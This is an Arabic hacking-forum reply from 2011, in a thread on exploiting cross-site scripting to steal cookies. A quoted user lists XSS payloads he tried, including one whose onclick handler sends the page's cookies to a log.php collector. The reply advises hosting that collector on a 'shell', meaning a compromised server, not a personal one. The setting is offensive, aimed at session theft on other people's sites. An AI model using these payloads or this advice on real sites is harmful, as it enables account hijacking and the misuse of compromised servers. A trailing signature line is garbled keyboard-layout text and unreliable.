التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. الـقرصـنـة والأختراق ~ The Hidden World Of Hackers .:: ] > حقن xss - ssi

إضافة رد
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 08-22-2011, 07:35 AM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
الصورة الرمزية bleu moon
 

 

 
إحصائية العضو








bleu moon غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 12
bleu moon is on a distinguished road

افتراضي رد: استغلال xss ..~ حتى استخراج الكوكيز ..~


اقتباس
المشاركة الأصلية كتبت بواسطة mass1993
يعطيك العافية اخوي عالشرح ...ولكن عندي استفسار:

انا عندي سيرفر شخصي اباتشي اصدار 2.5.8 ووضعت ملف الثغرة فيه وكل اشي تمام...ولكن لما كتبت هذا الكود بالمتصفح:

كود:
'"--></style></script>***************("Www.VBspiders.com")</script>
وضغطت انتر ما طلعلي تنبيه في المتصفح وطبعلي التاليي:

كود:
\'\"
ولكن لما كتبت الامر هذا :

كود:
'"--></style></script>***************(4444444)</script>
وضغطت انتر طلع التنبيه وكل اشي تمام...

ولكن لما اجيت احط هذا الامر:

كود:
"><a href="#" onclick="********.location='http://localhost/log.php' +escape(********.******);"><Click Me></a></script>
ورحت لملف nor15din ما لقيت اشي فيه...اخوي شو هالمشكلة بالله عليك وليش صار هيك معي؟؟؟

تحياتي

انت رافع ملف الوج على السيرفرا الشخصي وهذا غلط !
لازم يكون ع شل :(




v]: hsjyghg xss >>Z pjn hsjovh[ hg;,;d. la;gi l,q,u l,ru g;k hg]dk hgw,v hpjvht hsjtshv []d] vtu avp

   

رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)

الكلمات الدليلية (Tags)
مشكله, موضوع, موقع, لكن, الدين, الصور, احتراف, استفسار, جديد, رفع, شرح, xss


تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع


الساعة الآن 11:12 PM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0